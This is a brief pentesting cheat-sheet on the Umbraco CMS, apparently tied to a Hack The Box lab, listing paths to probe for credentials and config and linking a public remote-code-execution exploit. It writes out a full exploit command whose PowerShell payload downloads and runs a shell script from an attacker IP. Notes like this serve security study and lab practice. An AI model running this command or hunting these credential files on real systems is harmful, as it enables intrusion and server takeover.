umbraco
Interesting Paths
# login
/umbraco/#/login
# Check for umbracoConfigurationStatus (version)
# Check for <connectionStrings>
/Web.config
# use strings to check for creds
/App_Data/Umbraco.sdf
Umbraco Version v7.12.4
https://github.com/noraj/Umbraco-RCE
$ python exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180' -c 'powershell' -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.161/shell.ps1')"
UmbracoAdminReset.dll (if Write-access on dir)
https://our.umbraco.com/packages/developer-tools/umbraco-admin-reset/
Last updated
Was this helpful?